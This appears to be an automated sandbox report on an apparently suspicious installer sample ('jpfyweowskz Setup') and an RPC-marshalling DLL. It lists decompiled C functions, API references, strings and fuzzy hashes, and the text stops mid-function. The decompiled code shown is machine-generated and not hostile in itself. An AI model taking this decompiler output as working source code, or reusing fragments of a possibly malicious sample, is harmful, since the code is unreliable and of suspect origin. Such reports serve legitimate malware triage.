                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 44%
                                                                                                			E6EDA1310(signed int _a4, intOrPtr _a8, signed char* _a12) {
                                                                                                				signed char* _v8;
                                                                                                				signed char* _v12;
                                                                                                
                                                                                                				_v8 = _a12;
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				_a12 = _a12 + 6;
                                                                                                				if(( *_v8 & 0x000000ff) == 0x19) {
                                                                                                					_v12 =  &(_v8[_v8[4] + 4]);
                                                                                                					E6EDAD120( *_v12 & 0x000000ff, _a4, (_v8[2] & 0x0000ffff) + _a8, _v12);
                                                                                                					E6EDA7400(_v8, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                                					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                                					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                					E6EDAB030(_a4, _a8, _v8[2] & 0x0000ffff);
                                                                                                					E6EDAD360( *_v12 & 0x000000ff, _a4, (_v8[2] & 0x0000ffff) + _a8, _v12, 0);
                                                                                                					E6EDABFC0(_a4, _a8, _a12);
                                                                                                					return 0;
                                                                                                				}
                                                                                                				0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return 0;
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA1362
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-3112743540
                                                                                                • Opcode ID: a86e9498e6ed5b989e53f36243bf9af8210501cd2e2ba33e55cbc835b0f8d7b8
                                                                                                • Instruction ID: 4198b0060e38882d7327cde32868344ce5d219abce52d9950d8811743c012077
                                                                                                • Opcode Fuzzy Hash: a86e9498e6ed5b989e53f36243bf9af8210501cd2e2ba33e55cbc835b0f8d7b8
                                                                                                • Instruction Fuzzy Hash: 82414FB5904108BBCB04CFD8D890DAEBBF9AF89205F148588F9599B345E631EB51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA24E5
                                                                                                • NDRSContextMarshall2.RPCRT4(?,?,?,?,?,?), ref: 6EDA2571
                                                                                                Strings
                                                                                                • (%p, %p, %p, %p), xrefs: 6EDA2484
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA24D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionMarshall2Raise
                                                                                                • String ID: (%p, %p, %p, %p)$buffer overflow - Buffer = %p, BufferEnd = %p
                                                                                                • API String ID: 3146093750-483450353
                                                                                                • Opcode ID: 2a518355663e15844129661d052dea7559ef1b63e68769af0d4ac6ee189c5f92
                                                                                                • Instruction ID: 9b04de74fbbe572b0a60a80e6be5664b57327e33403819c4e2af36ab35367b65
                                                                                                • Opcode Fuzzy Hash: 2a518355663e15844129661d052dea7559ef1b63e68769af0d4ac6ee189c5f92
                                                                                                • Instruction Fuzzy Hash: 3A410E75600508EFDB04CF88D8A0FAA7BB6FF89344F14C158F95A9B395D631EA51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA4C3D
                                                                                                • NDRSContextUnmarshall2.RPCRT4(00000000,00000000,?,?,00000000), ref: 6EDA4CCB
                                                                                                Strings
                                                                                                • (%p, %p), xrefs: 6EDA4BDC
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA4C2B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionRaiseUnmarshall2
                                                                                                • String ID: (%p, %p)$buffer overflow - Buffer = %p, BufferEnd = %p
                                                                                                • API String ID: 3284517403-1857928792
                                                                                                • Opcode ID: 8f868eeb62c56d26d3d637736535a3a7344cf659a9af350abda93cfabd7c5418
                                                                                                • Instruction ID: f89f94b9a863d7938eb839db0bdce7e2f468f2d16ba598ba229406fa17b89cc8
                                                                                                • Opcode Fuzzy Hash: 8f868eeb62c56d26d3d637736535a3a7344cf659a9af350abda93cfabd7c5418
                                                                                                • Instruction Fuzzy Hash: 13410B75A00508EFDB04CF88C490FAABBB6FF89344F14C198E9599F395D631EA51CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 44%
                                                                                                			E6EDA4F50(int _a4, intOrPtr _a8, signed char* _a12) {
                                                                                                				signed char* _v8;
                                                                                                				signed char* _v12;
                                                                                                				signed int _t41;
                                                                                                
                                                                                                				_v8 = _a12;
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				_a12 = _a12 + 6;
                                                                                                				_t41 =  *_v8 & 0x000000ff;
                                                                                                				if(_t41 == 0x19) {
                                                                                                					_v12 =  &(_v8[_v8[4] + 4]);
                                                                                                					E6EDACC40( *_v12 & 0x000000ff, _a4, (_v8[2] & 0x0000ffff) + _a8, _v12);
                                                                                                					E6EDA73B0(_a4 + 0x14, (_v8[1] & 0x000000ff) + 1);
                                                                                                					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                                					E6EDAAF50(_a4, _v8[2] & 0x0000ffff);
                                                                                                					E6EDACE70( *_v12 & 0x000000ff, _a4, (_v8[2] & 0x0000ffff) + _a8, _v12, 0);
                                                                                                					return E6EDAC570(_a4, _a8, _a12);
                                                                                                				}
                                                                                                				0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return _t41;
                                                                                                			}







                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA4FA2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-3112743540
                                                                                                • Opcode ID: adcfe8712905135a252fa3ddf566cbd0a5e08c54d0dd38fe805b183a312d6644
                                                                                                • Instruction ID: e747e2269ff5c043d7f51d312ea16b1634fa1ba981c077842e9342348b78d266
                                                                                                • Opcode Fuzzy Hash: adcfe8712905135a252fa3ddf566cbd0a5e08c54d0dd38fe805b183a312d6644
                                                                                                • Instruction Fuzzy Hash: 5A3130B5904108BBCB44CFD8D890DAE77B9AF89205F14C598F9599B341E631EB50DBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 44%
                                                                                                			E6EDA5E80(signed int _a4, signed char* _a8) {
                                                                                                				signed char* _v8;
                                                                                                				signed char* _v12;
                                                                                                
                                                                                                				_v8 = _a8;
                                                                                                				0x6eda0000("(%p, %p)\n", _a4, _a8);
                                                                                                				_a8 = _a8 + 6;
                                                                                                				if(( *_v8 & 0x000000ff) == 0x19) {
                                                                                                					_v12 =  &(_v8[_v8[4] + 4]);
                                                                                                					E6EDAD650( *_v12 & 0x000000ff, _a4, _v12);
                                                                                                					E6EDA73D0(_v8, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                                					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                                					E6EDAAF00(_a4, _v8[2] & 0x0000ffff);
                                                                                                					E6EDADE30( *_v12 & 0x000000ff, _a4, _v12, 0);
                                                                                                					 *((intOrPtr*)(_a4 + 0x18)) = (_v8[2] & 0x0000ffff) +  *((intOrPtr*)(_a4 + 0x18));
                                                                                                					E6EDAC7E0(_a4, _a8);
                                                                                                					return  *((intOrPtr*)(_a4 + 0x18));
                                                                                                				}
                                                                                                				0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return 0;
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA5ECE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p)$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-3815017672
                                                                                                • Opcode ID: a73272936a7fea971f11e8bae1bd3dcd0dc0def5d07a6b41bf56421482e5c67c
                                                                                                • Instruction ID: b461bad856a7741ea7e81a2e912dcaf0d84386c44faabeaf2b22e17e5b5bbe34
                                                                                                • Opcode Fuzzy Hash: a73272936a7fea971f11e8bae1bd3dcd0dc0def5d07a6b41bf56421482e5c67c
                                                                                                • Instruction Fuzzy Hash: A13162B5900108BBCB04CFD8D891DADBBB9AF89209F14C198FD499B341E631EF51DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 51%
                                                                                                			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                				char _v36;
                                                                                                				char _v68;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* _t26;
                                                                                                				void* _t34;
                                                                                                				signed int _t36;
                                                                                                				signed int _t39;
                                                                                                				unsigned int _t46;
                                                                                                
                                                                                                				_t46 = _a12;
                                                                                                				_push(0x14);
                                                                                                				_pop(0);
                                                                                                				_t34 = 0xffffffdc;
                                                                                                				if(_t46 < 0x100000) {
                                                                                                					_push(0xa);
                                                                                                					_pop(0);
                                                                                                					_t34 = 0xffffffdd;
                                                                                                				}
                                                                                                				if(_t46 < 0x400) {
                                                                                                					_t34 = 0xffffffde;
                                                                                                				}
                                                                                                				if(_t46 < 0xffff3333) {
                                                                                                					_t39 = 0x14;
                                                                                                					asm("cdq");
                                                                                                					_t46 = _t46 + 1 / _t39;
                                                                                                				}
                                                                                                				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                                                                				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
                                                                                                				_t21 = _t46 & 0x00ffffff;
                                                                                                				_t36 = 0xa;
                                                                                                				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                                                                				_push(_t46 >> 0);
                                                                                                				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
                                                                                                				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
                                                                                                				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
                                                                                                			}














                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                                                                                                • wsprintfA.USER32 ref: 0040454C
                                                                                                • SetDlgItemTextA.USER32 ref: 0040455F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                • String ID: %u.%u%s%s
                                                                                                • API String ID: 3540041739-3551169577
                                                                                                • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                                                                                • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                                                                                                • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                                                                                • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA46B0(intOrPtr _a4, signed int* _a8, void* _a12, signed int _a16) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				signed int _t42;
                                                                                                				void* _t61;
                                                                                                				void* _t64;
                                                                                                
                                                                                                				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				_a12 = _a12 + 1;
                                                                                                				_v12 = E6EDAF410(_a4,  &_a12);
                                                                                                				0x6eda0000("unmarshalled discriminant %x\n", _v12);
                                                                                                				_t64 = _t61 + 0x24;
                                                                                                				_a12 =  *_a12 + _a12;
                                                                                                				_v8 =  *_a12;
                                                                                                				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                                					_a16 = 1;
                                                                                                				}
                                                                                                				if((_a16 & 0x000000ff) != 0) {
                                                                                                					_t42 = _v8 & 0x0000ffff;
                                                                                                					__imp__NdrAllocate(_a4, _t42);
                                                                                                					 *_a8 = _t42;
                                                                                                				}
                                                                                                				if((_a16 & 0x000000ff) != 0) {
                                                                                                					E6EDB0770( *_a8, 0, _v8 & 0x0000ffff);
                                                                                                					_t64 = _t64 + 0xc;
                                                                                                				}
                                                                                                				return E6EDAED20(_a4, _a8, _v12, _a12, 0);
                                                                                                			}









                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Allocate_memset
                                                                                                • String ID: (%p, %p, %p, %d)$unmarshalled discriminant %x
                                                                                                • API String ID: 3995017260-139691638
                                                                                                • Opcode ID: d4dcd74a8e6caaa6ed8f6088586d6328da12b4c8a63080247b15a3db9a278451
                                                                                                • Instruction ID: 29c4a5bcdccc7afffe62c0f37bfaf8810d7f9802c8b83d37013864a3b251c71d
                                                                                                • Opcode Fuzzy Hash: d4dcd74a8e6caaa6ed8f6088586d6328da12b4c8a63080247b15a3db9a278451
                                                                                                • Instruction Fuzzy Hash: 1D2151B5A00249EBCB04CFA8DC50AEF77B9AF49605F008558FE158B241E731DA50CBB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 51%
                                                                                                			E00401BAD() {
                                                                                                				signed int _t28;
                                                                                                				CHAR* _t31;
                                                                                                				long _t32;
                                                                                                				int _t37;
                                                                                                				signed int _t38;
                                                                                                				int _t42;
                                                                                                				int _t48;
                                                                                                				struct HWND__* _t52;
                                                                                                				void* _t55;
                                                                                                
                                                                                                				 *(_t55 - 0x34) = E004029CB(3);
                                                                                                				 *(_t55 + 8) = E004029CB(4);
                                                                                                				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                                                                                					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                                                                                                				}
                                                                                                				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                                                                                				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                                                                                					 *(_t55 + 8) = E004029E8(0x44);
                                                                                                				}
                                                                                                				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                                                                                				_push(1);
                                                                                                				if(__eflags != 0) {
                                                                                                					_t50 = E004029E8();
                                                                                                					_t28 = E004029E8();
                                                                                                					asm("sbb ecx, ecx");
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t31 =  ~( *_t27) & _t50;
                                                                                                					__eflags = _t31;
                                                                                                					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                                                                					goto L10;
                                                                                                				} else {
                                                                                                					_t52 = E004029CB();
                                                                                                					_t37 = E004029CB();
                                                                                                					_t48 =  *(_t55 - 0x10) >> 2;
                                                                                                					if(__eflags == 0) {
                                                                                                						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                                                                                						L10:
                                                                                                						 *(_t55 - 8) = _t32;
                                                                                                					} else {
                                                                                                						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                                                                                						asm("sbb eax, eax");
                                                                                                						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                                                					}
                                                                                                				}
                                                                                                				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                                                                                				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                                                                                					_push( *(_t55 - 8));
                                                                                                					E00405889();
                                                                                                				}
                                                                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
                                                                                                				return 0;
                                                                                                			}













                                                                                                APIs
                                                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Timeout
                                                                                                • String ID: !
                                                                                                • API String ID: 1777923405-2657877971
                                                                                                • Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                                                                                • Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
                                                                                                • Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                                                                                • Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0040373D(void* __ecx, void* __eflags) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed short _t6;
                                                                                                				intOrPtr _t11;
                                                                                                				signed int _t13;
                                                                                                				intOrPtr _t15;
                                                                                                				signed int _t16;
                                                                                                				signed short* _t18;
                                                                                                				signed int _t20;
                                                                                                				signed short* _t23;
                                                                                                				intOrPtr _t25;
                                                                                                				signed int _t26;
                                                                                                				intOrPtr* _t27;
                                                                                                
                                                                                                				_t24 = "1033";
                                                                                                				_t13 = 0xffff;
                                                                                                				_t6 = E004058A2(__ecx, "1033");
                                                                                                				while(1) {
                                                                                                					_t26 =  *0x42eba4; // 0x1
                                                                                                					if(_t26 == 0) {
                                                                                                						goto L7;
                                                                                                					}
                                                                                                					_t15 =  *0x42eb70; // 0x5ff628
                                                                                                					_t16 =  *(_t15 + 0x64);
                                                                                                					_t20 =  ~_t16;
                                                                                                					_t18 = _t16 * _t26 +  *0x42eba0;
                                                                                                					while(1) {
                                                                                                						_t18 = _t18 + _t20;
                                                                                                						_t26 = _t26 - 1;
                                                                                                						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						if(_t26 != 0) {
                                                                                                							continue;
                                                                                                						}
                                                                                                						goto L7;
                                                                                                					}
                                                                                                					 *0x42e340 = _t18[1];
                                                                                                					 *0x42ec08 = _t18[3];
                                                                                                					_t23 =  &(_t18[5]);
                                                                                                					if(_t23 != 0) {
                                                                                                						 *0x42e33c = _t23;
                                                                                                						E00405889(_t24,  *_t18 & 0x0000ffff);
                                                                                                						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "jpfyweowskz Setup", 0xfffffffe));
                                                                                                						_t11 =  *0x42eb8c; // 0x2
                                                                                                						_t27 =  *0x42eb88; // 0x5ff7d4
                                                                                                						if(_t11 == 0) {
                                                                                                							L15:
                                                                                                							return _t11;
                                                                                                						}
                                                                                                						_t25 = _t11;
                                                                                                						do {
                                                                                                							_t11 =  *_t27;
                                                                                                							if(_t11 != 0) {
                                                                                                								_t5 = _t27 + 0x18; // 0x5ff7ec
                                                                                                								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
                                                                                                							}
                                                                                                							_t27 = _t27 + 0x418;
                                                                                                							_t25 = _t25 - 1;
                                                                                                						} while (_t25 != 0);
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					L7:
                                                                                                					if(_t13 != 0xffff) {
                                                                                                						_t13 = 0;
                                                                                                					} else {
                                                                                                						_t13 = 0x3ff;
                                                                                                					}
                                                                                                				}
                                                                                                			}


















                                                                                                APIs
                                                                                                • SetWindowTextA.USER32(00000000,jpfyweowskz Setup), ref: 004037D5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: TextWindow
                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\$jpfyweowskz Setup
                                                                                                • API String ID: 530164218-188207588
                                                                                                • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                                                                                • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                                                                                                • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                                                                                • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006C5), ref: 6EDAEA69
                                                                                                Strings
                                                                                                • falling back to empty default case for 0x%x, xrefs: 6EDAEA7F
                                                                                                • type %04x, xrefs: 6EDAEA2E
                                                                                                • no arm for 0x%x and no default case, xrefs: 6EDAEA57
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: falling back to empty default case for 0x%x$no arm for 0x%x and no default case$type %04x
                                                                                                • API String ID: 3997070919-939914449
                                                                                                • Opcode ID: f75d763780fa64bc6e4a048f16bee0d81d9e2f3bae0e0baf40580766570b0415
                                                                                                • Instruction ID: 3e342b4ad4ee7948a339752d333239a89e1187a8b2d6cb7622ed1d7fcc1d97c5
                                                                                                • Opcode Fuzzy Hash: f75d763780fa64bc6e4a048f16bee0d81d9e2f3bae0e0baf40580766570b0415
                                                                                                • Instruction Fuzzy Hash: 9E219AA4A1425AEBCB00DFE8C8805BE73B2FF45745F108968EE529B240F370DBA0D765
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDA6AF0(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
                                                                                                				signed char* _v8;
                                                                                                				signed char* _v12;
                                                                                                				signed int _t29;
                                                                                                
                                                                                                				_v8 = _a12;
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				_a12 = _a12 + 6;
                                                                                                				_t29 =  *_v8 & 0x000000ff;
                                                                                                				if(_t29 == 0x19) {
                                                                                                					_v12 =  &(_v8[_v8[4] + 4]);
                                                                                                					E6EDAE210( *_v12 & 0x000000ff, _a4, (_v8[2] & 0x0000ffff) + _a8, _v12, 0);
                                                                                                					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                                					return E6EDACA30(_a4, _a8, _a12);
                                                                                                				}
                                                                                                				0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
